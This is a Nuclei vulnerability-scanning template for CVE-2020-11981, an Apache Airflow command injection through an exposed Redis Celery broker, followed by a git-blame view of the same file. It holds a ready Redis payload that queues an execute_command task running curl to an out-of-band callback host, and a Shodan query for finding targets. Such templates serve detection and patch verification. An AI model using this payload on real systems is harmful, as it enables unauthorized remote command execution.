nuclei-templates/network/cves/2020/CVE-2020-11981.yaml

id: CVE-2020-11981

info:
  name: Apache Airflow <=1.10.10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
  reference:
    - https://github.com/apache/airflow/pull/9178
    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11981
    cwe-id: CWE-78
  metadata:
    max-request: 2
    shodan-query: product:"redis"
    verified: true
  tags: network,redis,unauth,apache,airflow,vulhub

variables:
  data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
  encode1: '[[["curl", "http://'
  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
  end: '"}'

tcp:
  - inputs:
      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:6379"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`id: CVE-2020-11981`

			`info:`
lint fix 2023-05-16 18:09:07 +00:00			`name: Apache Airflow <=1.10.10 - Command Injection`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`author: pussycat0x`
			`severity: critical`
			`description: \|`
			`An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.`
			`reference:`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`- https://github.com/apache/airflow/pull/9178`
minor -update 2023-05-17 13:16:14 +00:00			`- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981`
Updated CVE-2020-11981 2023-05-29 11:32:09 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`cvss-score: 9.8`
Updated CVE-2020-11981 2023-05-29 11:32:09 +00:00			`cve-id: CVE-2020-11981`
			`cwe-id: CWE-78`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`metadata:`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`max-request: 2`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`shodan-query: product:"redis"`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`tags: network,redis,unauth,apache,airflow,vulhub`
CVE-2020-11981 2023-05-16 16:29:43 +00:00
			`variables:`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
minor -update 2023-05-17 13:16:14 +00:00			`encode1: '[[["curl", "http://'`
			`encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`end: '"}'`
CVE-2020-11981 2023-05-16 16:29:43 +00:00
			`tcp:`
			`- inputs:`
minor -update 2023-05-17 13:16:14 +00:00			`- data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"`
lint fix 2023-05-16 18:09:07 +00:00			`read: 1024`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`host:`
			`- "{{Hostname}}"`
			`- "{{Host}}:6379"`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`- "http"`
added additional matcher 2023-05-18 09:28:30 +00:00
			`- type: word`
			`part: interactsh_request`
			`words:`
			`- "User-Agent: curl"`